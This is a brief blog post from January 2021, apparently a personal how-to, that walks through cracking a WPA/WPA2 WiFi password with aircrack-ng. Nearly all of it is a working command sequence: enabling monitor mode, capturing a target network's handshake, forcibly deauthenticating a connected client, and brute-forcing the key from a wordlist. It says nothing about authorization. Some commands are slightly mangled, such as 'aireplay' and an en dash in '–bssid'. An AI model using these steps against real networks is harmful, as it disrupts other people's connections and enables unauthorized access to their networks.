January 17, 2021
Brute Forcing WPA WiFi Encryption
WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian and an Intel Corporation Centrino Wireless-N 1000 card:
- Stop Network Manager:
/etc/init.d/network-manager stop - Enter monitor mode:
airmon-ng start wlan0 - Find nearby networks:
airodump-ng mon0 - Identify the target BSSID and Channel number (
-coption below) - Start packet capture and leave running:
airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0 - Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
- Or attempt to force a WPA Handshake by deauthenticating a client station:
aireplay --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0(where-cis the MAC address of one of the stations displayed in airodump-ng) - Apply brute force:
aircrack-ng -w password.lst capturefile.cap - The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
- Stop monitor mode:
airmon-ng stop mon0
